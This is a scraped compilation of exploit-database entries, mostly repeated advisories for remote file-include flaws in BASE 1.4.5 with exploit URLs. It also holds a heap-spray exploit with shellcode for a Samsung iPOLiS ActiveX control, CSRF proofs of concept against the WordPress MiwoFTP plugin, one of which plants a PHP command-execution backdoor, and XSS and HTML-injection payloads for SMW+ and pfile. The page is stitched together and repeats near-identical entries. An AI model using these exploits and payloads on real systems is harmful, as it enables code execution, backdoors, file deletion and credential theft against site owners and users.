HireHackking

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/setup/base_conf_contents.php?BASE_Language=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/includes/base_state_common.inc.php?GLOBALS[user_session_path]=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/setup/setup2.php?ado_inc_php=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_ag_main.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_qry_alert.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_qry_common.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_stat_class.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_stat_alerts.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_stat_common.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_stat_ipaddr.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_stat_sensor.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_stat_uaddr.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_stat_time.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_user.php?BASE_path=[EV!L]

<html> <!-- Vendor Homepage: https://www.samsung-security.com/Tools/device-manager.aspx Samsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution (heap spray) CVE: 2015-0555 Author: Praveen Darshanam http://blog.disects.com/2015/02/samsung-ipolis-1122-xnssdkdeviceipinsta.html http://darshanams.blogspot.com/ Tested on Windows XP SP3 IE6/7 Thanks to Peter Van Eeckhoutte for his wonderfull exploit writing tutorials --> <object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object> <script> var shellcode = unescape('%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u4100'); var bigblock = unescape('%u9090%u9090'); var headersize = 20; var slackspace = headersize + shellcode.length; while (bigblock.length < slackspace) bigblock += bigblock; var fillblock = bigblock.substring(0,slackspace); var block = bigblock.substring(0,bigblock.length - slackspace); while (block.length + slackspace < 0x40000) block = block + block + fillblock; var memory = new Array(); for (i = 0; i < 500; i++){ memory[i] = block + shellcode } // SEH and nSEH will point to 0x06060606 // 0x06060606 will point to (nops+shellcode) chunk var hbuff = ""; for (i = 0; i <5000; i++) { hbuff += "\x06"; } // trigget crash target.ReadConfigValue(hbuff); </script> </html>

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/index.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/admin/base_useradmin.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/admin/index.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. http://www.example.com/base_ag_main.php?ag_action=create File and past your code

WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit Vendor: Miwisoft LLC Product web page: http://www.miwisoft.com Affected version: 1.0.5 Summary: MiwoFTP is a smart, fast and lightweight file manager plugin that operates from the back-end of WordPress. Desc: Input passed to the 'selitems[]' parameter is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server using directory traversal sequences passed within the affected POST parameter. Tested on: Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5240 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5240.php Vendor: http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog 24.03.2015 -- <html> <body> <form action="http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=post" method="POST"> <input type="hidden" name="do_action" value="delete" /> <input type="hidden" name="first" value="y" /> <input type="hidden" name="selitems[]" value="../../../../../pls_mr_jailer_dont_deleteme.txt" /> <input type="submit" value="Gently" /> </form> </body> </html>

 WordPress MiwoFTP Plugin 1.0.5 Multiple CSRF XSS Vulnerabilities Vendor: Miwisoft LLC Product web page: http://www.miwisoft.com Affected version: 1.0.5 Summary: MiwoFTP is a smart, fast and lightweight file manager plugin that operates from the back-end of WordPress. Desc: MiwoFTP WP Plugin suffers from multiple cross-site request forgery and xss vulnerabilities. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Input passed to several GET/POST parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5241 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5241.php Vendor: http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog 24.03.2015 -- GET: (params: dir, item, order, srt) ------------------------------- /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=list&dir=wp-content"><script>alert(1)</script>&order=name&srt=yes /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=wp-content%2Fuploads&item=test.php"><img%20src%3da%20onerror%3dalert(2)>&order=name&srt=yes /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=search&order=name"><script>alert(3)</script>&srt=yes&searchitem=test&subdir=y /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=search&order=name&srt=yes"><script>alert(4)</script> --- POST: (params: code, fname, new_dir, newitems[], searchitem, selitems[]) ------------------------------------------------------------------ /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=edit&dir=wp-content%2Fuploads%2F2015&item=test.php&order=name&srt=yes - dosave=yes&code="><script>alert(1)</script>&fname=test.php /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=edit&dir=wp-content%2Fuploads%2F2015&item=test.php&order=name&srt=yes - dosave=yes&code=1&fname=test.php"><img%20src%3da%20onerror%3dalert(2)> /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=post&dir=wp-content%2Fuploads&order=name&srt=yes - do_action=copy&confirm=false&first=n&new_dir=wp-content%2Fuploads%2F1"><script>alert(3)</script>&selitems%5B%5D=test&newitems%5B%5D=test.php /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=post&dir=wp-content%2Fuploads&order=name&srt=yes - do_action=copy&confirm=false&first=n&new_dir=wp-content%2Fuploads%2F2015&selitems%5B%5D=test&newitems%5B%5D=test.php"><script>alert(4)</script> /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=search&order=name&srt=yes - searchitem=test"><script>alert(5)</script>&subdir=y /wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=arch&dir=wp-content%2Fuploads&order=name&srt=yes - selitems%5B%5D=test.zip"><script>alert(6)</script>&name=test&type=zip

 WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Creation Exploit (RCE) Vendor: Miwisoft LLC Product web page: http://www.miwisoft.com Affected version: 1.0.5 Summary: MiwoFTP is a smart, fast and lightweight file manager plugin that operates from the back-end of WordPress. Desc: MiwoFTP WP Plugin suffers from a cross-site request forgery remote code execution vulnerability. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions like executing arbitrary PHP code by uploading a malicious PHP script file, with administrative privileges, if a logged-in user visits a malicious web site. Tested on: Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5242 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5242.php Vendor: http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog 24.03.2015 -- RCE CSRF PoC for masqueraded payload for admin view when editing: Logic error: When admin clicks on malicious link the plugin will: 1. Search existing file for edit: action=edit&dir=/&item=wp-comments-post.php. 2. In the root folder of WP, file wp-comments.php is created. 3. Payload is an excerpt from wp-comments-post.php without '<?php' part (SE+HTMLenc). 4. Somewhere below in that code, the evil payload: <?php system($_GET['c']); ?> is inserted. 5. Admin is presented with interface of editing wp-comments.php with contents from wp-comments-post.php. 6. After that, no matter what admin clicks (CSRF) (Save, Reset or Close), backdoor file is created (wp-comments.php). 7. Attacker executes code, ex: http://localhost/wordpress/wp-comments.php?c=whoami <html> <body> <form action="http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=edit&dir=/&item=wp-comments-post.php&order=name&srt=yes" method="POST"> <input type="hidden" name="dosave" value="yes" /> <input type="hidden" name="code" value="/** * Handles Comment Post to WordPress and prevents duplicate comment posting. * * @package WordPress */ if ( 'POST' != $_SERVER['REQUEST_METHOD'] ) { header('Allow: POST'); header('HTTP/1.1 405 Method Not Allowed'); header('Content-Type: text/plain'); exit; } /** Sets up the WordPress Environment. */ require( dirname(__FILE__) . '/wp-load.php' ); nocache_headers(); $comment_post_ID = isset($_POST['comment_post_ID']) ? (int) $_POST['comment_post_ID'] : 0; $post = get_post($comment_post_ID); if ( empty( $post->comment_status ) ) { /** * Fires when a comment is attempted on a post that does not exist. * * @since 1.5.0 * * @param int $comment_post_ID Post ID. */ do_action( 'comment_id_not_found', $comment_post_ID ); exit; } // get_post_status() will get the parent status for attachments. $status = get_post_status($post); $status_obj = get_post_status_object($status); if ( ! comments_open( $comment_post_ID ) ) { /** * Fires when a comment is attempted on a post that has comments closed. * * @since 1.5.0 * * @param int $comment_post_ID Post ID. */ do_action( 'comment_closed', $comment_post_ID ); wp_die( __( 'Sorry, comments are closed for this item.' ), 403 ); } elseif ( 'trash' == $status ) { /** * Fires when a comment is attempted on a trashed post. * * @since 2.9.0 * * @param int $comment_post_ID Post ID. */<?php system($_GET['c']); ?> /* Filler */ by LiquidWorm, 2015" /> <input type="hidden" name="fname" value="wp-comments.php" /> <input type="submit" value="Submit form" /> </form> </body> </html> --- http://localhost/wordpress/wp-comments.php?c=whoami

source: https://www.securityfocus.com/bid/51980/info SMW+ is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input. Attacker-supplied HTML and script code can run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. SMW+ 1.5.6 is vulnerable; other versions may also be affected. http://www.example.com/index.php/Special:FormEdit?target=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F&categories=Calendar+

source: https://www.securityfocus.com/bid/51982/info pfile is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. pfile 1.02 is vulnerable; other versions may also be affected. http://www.example.compfile/kommentar.php?filecat=[xss]&fileid=0

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_stat_ports.php?BASE_path=[EV!L]